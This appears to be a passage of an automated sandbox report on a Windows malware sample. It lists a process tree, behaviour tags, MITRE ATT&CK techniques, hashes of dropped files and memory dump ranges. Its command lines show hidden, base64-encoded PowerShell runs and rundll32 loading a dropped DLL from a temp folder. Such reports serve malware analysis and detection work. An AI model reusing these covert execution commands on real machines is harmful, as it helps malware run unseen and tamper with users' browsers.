-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WZpWNMsDzSAcKsSA\hJvnqnXE\ZZjgoob.dll",#1 /KdidaF 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MRaTohzfdszDuijXP"4⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {AAAE5CEA-6DF8-420C-8F02-1ABE9D710A77} S-1-5-21-268080393-3149932598-1824759070-1000:UHRQKJCP\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\NNMAoTKMcAkAC\reBcspO.xmlFilesize
2KB
MD5699c55df3079ecb0109ed6c0193fd2ef
SHA16de5fe4783e193721c5cceba0c9cf33617abb436
SHA256de69f90ba5dfe36575c58d9a637c8e8a6a06368c5947855f04e53ed241c06cd7
SHA5121fe38fcc37cc9b26431fa9b48b350bbcd1eed68fb3b9626a4e7b8ec8da6c2406350b43f3667b8fa29bcb58abc6bd0a7a45d1fdb60944813e62dfb1857a898ae6
-
C:\Program Files (x86)\bBBSFQQZU\SJvSgHN.xmlFilesize
2KB
MD5a4eb2534b649888066e617f51eef59f1
SHA1d2700f270dd907aa66f8492c81d70be13d812d64
SHA256030b11d1bb1ef00f63d77cd2eefbac261689ae2c9e2f86da06c4f7b44af7c6b4
SHA5125f11fd9ac919d3517d5c75abffaeb053c2d4ef09fc9cbe7d79478a9773e2f9136d47a28af0e12f3026a6929f465f6715a064fb1b157df36daa9accf162f65182
-
C:\Program Files (x86)\rPikKiIbwrQGukIChiR\KXrnhDm.xmlFilesize
2KB
MD5e98e845203d93a554873ca6cbe8151b7
SHA1f92cfe68c6838db336bc3703b43babf5a1ab6bfd
SHA2567500e0d66238598d3335983928b573a2c0653bc6514681229de0517b9f50f21a
SHA5121f8c56e4358a132e1814d4f6648ffa90aa0a957c26c11b9f3c9adbc654a0add6f1bce01c9689db7b725206f7b4b2722087a3aedb0d4f8dc9eb97ec73f8beae3d
-
C:\Program Files (x86)\rUfZlqUIdWiU2\BvMjMeI.xmlFilesize
2KB
MD578ef1d0d79164aa68272c88ac65eb49b
SHA1778544969984a6eaa48d8a9a8ae68a119d9c9831
SHA256b8e4bb93faa627475095f5d20f5394c6f87ae1ef2ab1d8f07ad31430b4a318d0
SHA512afa82689b756760c47a91942f960e9999b87bf0116e6df753ce4e75788abf1cefead1c4ee9f0ac952710a5f19563723c4537e782142f08bcdbb9d5d1949b2a01
-
C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpiFilesize
2.0MB
MD5a1d851ab5c13a2808d9445fb37221ca2
SHA1f1d1c075f5d3e517d81941f6a0c91bf892bff7cd
SHA256d272d51320cde497e8a41a3885394e9c0a370c47f70b4d83617ec374f1203f12
SHA51261b050750e5c1089727af6de373c92b450f2cd273848d02a790425bfcb85d869048550b135d20c3d6c177b797c8140a5d1e6e86333c7c201652e66a2f4f7f24e
-
C:\ProgramData\fHdtCMTPryqSDgVB\KfWhvWN.xmlFilesize
2KB
MD56a9b7dffcecd8cd99d4dce6510d0ca4b
SHA123f99bf7fd7d78146e993ca58559351ad93bfec2
SHA256f62c292a8240ab03f61c7cd248193bcdc4f764d67de9cad0ca1ad4ee02af84c4
SHA512fcf63bf17aa9400045cb801742c04eb277c8796a5ce901e4cbe6c29472230b67d90a03f990d3fbfc535f4d9721a7474ae4a90b2c848064968911919604d85cbf
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.jsonFilesize
187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.jsonFilesize
136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.jsonFilesize
150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
10KB
MD5b77e90bacadbb009b369a555b63e3e4f
SHA166825ef5d0d160de8d6e58cad102322ebce8a285
SHA256a88ee100ae260be3db1bc63384321ce3ac1cdc53df300dc1308ea734f41b9a54
SHA512ebae355a75889be1e9ec12844536f6fccd0fc9434ae69e0f46b20b9c87064b4362f4d782e83d3857e8ccb65c484778f7d56170991827571db4d75ea8342e0bbd
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesFilesize
27KB
MD5454e82a27c8c94cf4a50b6772486ce77
SHA1af7108f8f3894aa8e99111b2173bad37c337200c
SHA2566646b11cc7bd1e6233a6d442a725faee0b6fad5c0ac6f68542dcacb268bbf33c
SHA512b41b18c1cc6faa29d6385040d8d5c978870804ba96a708068767e118797a32a7216c63803f4833e1a2fdb7257ecfaead69948f0b57dab320165cad0108f7e932
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD58e71ff61c670fd29ecc07d400868d8f3
SHA10600b27b4806e811119441a2234abcc257483b10
SHA25653ea14c1c041a72868a54c96ccafbbe3eaaa6b9299c4f322d320f9977018c499
SHA512ba69884034861102569c2f3542e936748435476260f77a04667727565e87911c8a075a37e8c75be2dc10dc078bea207e7bc076ec54ccb9d764c0b3cc336b8451
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GYB14GNDNHNK3CQTHP1X.tempFilesize
7KB
MD5d9d9a42d3b3ab22052776e5689ec8b28
SHA198bae46b61bb221f347228cac06749c06089e1f4
SHA25699a2cdc0af914a8468f6cf852dd26298467612370bc079ac8c7c118ed111376b
SHA51227b32c50e903339b3959a0cb3ff5cbfe60bad34af210dd87788e4df3cd9def02ebeb99873deedc04c6428dd37455c188157bb0970cc32ae3f6cf6165be7d8a91
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\nfhvy4wu.default-release\prefs.jsFilesize
7KB
MD5303effdd12a66e953e48b0fbd5bb66e4
SHA1884eafb376da21fd81c41f6efbbdfeed88932b2b
SHA2566cda32c18ca8c7b0919199ba58b983be72afdacbc5c572842e30eaf072ccdba7
SHA5128b2ddc81272efa63e206bb9f74d3132a2815484149e1e92cf9e024a3d9aee8e5bf4522d59389a5701be6f1d505e661f77dce35aab67a13835f44c32ad3beef5c
-
C:\Windows\Temp\WZpWNMsDzSAcKsSA\KWnDXiBt\LvfbgIXdSRSlFCkX.wsfFilesize
9KB
MD522aa5a4d56fefc869327500e3d4564dc
SHA10aedea8de4d76260316194eb9b6e59f3182e45bf
SHA256e8909f285496c016340b334347b2ebfd79ec21cef24a49053e8e6f5d30f04f44
SHA512cf3825c2a0aeb052ad1e069f9140f852df6e3c1b63001d44899ef747bc82dcf731b0f7f45ec24df00f9f37157cfefbb80098795debac1744c15835bd513b1397
-
C:\Windows\Temp\WZpWNMsDzSAcKsSA\hJvnqnXE\ZZjgoob.dllFilesize
6.5MB
MD52c5315f48e9b097d2c447e016743854f
SHA184006269f2b54df8bef71d46364bd82946b24759
SHA256233a6dfcb0ea347aed469bac784313ce0fb0dbc2ce84b5f3b3561d4741b03dc2
SHA512efd65e08582051bf7ef3795f7d0718aab625ea1500eaae19b0a665807b697e81a0e1dd580885765f364ab3e763ed913a19cbbe27327bc45ce0c1a0aeb65ce4ec
-
C:\Windows\system32\GroupPolicy\Machine\Registry.polFilesize
5KB
MD53d52426af4887c43abd62ceb79d16e53
SHA13a4ca1704f691c6ad644b15aca9451e2a5556aee
SHA2561f3929e095ff6be934e2ea77c3e52f4dd2c6c0578753b90a03b2190dacc0b5b9
SHA5122059e2e6d5e964055a53817f3aaa491113cd467c593b9c3403e0de9f5a0359cfb2b18613e570fe792d2df5af74cfa9f16b7a2336cd8e148a35bd87e14322fd44
-
\Users\Admin\AppData\Local\Temp\7zS1786.tmp\Install.exeFilesize
6.4MB
MD50ab5f17a164d83d986ee18c044e754ca
SHA1f4378ad12c7060689f510d4000fb1d2e35fc9271
SHA256aea62de9a1c790a66c111f2533ec973cb154ec8f975be782172eb686b4e9a753
SHA5126efdecb407420615d86f48f564f954f1442d96d2ef8884dc52cc2951978c59361b5e93fd0d8b55c736f316cc12593937733be458bab9de4b94423773549e2f74
-
\Users\Admin\AppData\Local\Temp\7zS196A.tmp\Install.exeFilesize
6.6MB
MD5c459c807bebcbb6553ff3388b249a9fd
SHA16e428b6c77c966e33c5c0e321d722b57bd3bf975
SHA2569c3372c448ccebbe7b771c24c207a0ae0e145a25d0e96f5ffb0559ff5571154b
SHA5127641130d16107aa5bdf16f39a6f9e6404230376bae4a9489b0b9462218075c4a0cea35cff3b434c6a352f05f49aca4a3f71839acf16cbe278ac49235ca6291cf
-
memory/768-59-0x000000001B5D0000-0x000000001B8B2000-memory.dmpFilesize
2.9MB
-
memory/768-61-0x0000000002390000-0x0000000002398000-memory.dmpFilesize
32KB
-
memory/1412-78-0x0000000000A10000-0x00000000010B5000-memory.dmpFilesize
6.6MB
-
memory/1412-85-0x0000000010000000-0x0000000013BCB000-memory.dmpFilesize
59.8MB
-
memory/1412-95-0x00000000014D0000-0x0000000001555000-memory.dmpFilesize
532KB
-
memory/1412-128-0x0000000001A80000-0x0000000001AE0000-memory.dmpFilesize
384KB
-
memory/1412-311-0x0000000002E70000-0x0000000002EF8000-memory.dmpFilesize
544KB
-
memory/1412-321-0x0000000003190000-0x0000000003262000-memory.dmpFilesize
840KB
-
memory/1412-352-0x0000000000A10000-0x00000000010B5000-memory.dmpFilesize
6.6MB
-
memory/1504-353-0x0000000001450000-0x000000000501B000-memory.dmpFilesize
59.8MB
-
memory/1728-40-0x0000000010000000-0x0000000013BCB000-memory.dmpFilesize
59.8MB
-
memory/1728-82-0x00000000002F0000-0x0000000000995000-memory.dmpFilesize
6.6MB
-
memory/1728-60-0x00000000002F0000-0x0000000000995000-memory.dmpFilesize
6.6MB
-
memory/1728-38-0x00000000002F0000-0x0000000000995000-memory.dmpFilesize
6.6MB
-
memory/2132-35-0x00000000016C0000-0x0000000001D65000-memory.dmpFilesize
6.6MB
-
memory/2132-34-0x0000000001010000-0x00000000016B5000-memory.dmpFilesize
6.6MB
-
memory/2132-27-0x0000000010000000-0x0000000013BCB000-memory.dmpFilesize
59.8MB
-
memory/2132-23-0x0000000001010000-0x00000000016B5000-memory.dmpFilesize
6.6MB
-
memory/2132-24-0x00000000016C0000-0x0000000001D65000-memory.dmpFilesize
6.6MB
-
memory/2132-25-0x00000000016C0000-0x0000000001D65000-memory.dmpFilesize
6.6MB
-
memory/2252-50-0x0000000002860000-0x0000000002868000-memory.dmpFilesize
32KB
-
memory/2252-49-0x000000001B660000-0x000000001B942000-memory.dmpFilesize
2.9MB
-
memory/3016-22-0x00000000023A0000-0x0000000002A45000-memory.dmpFilesize
6.6MB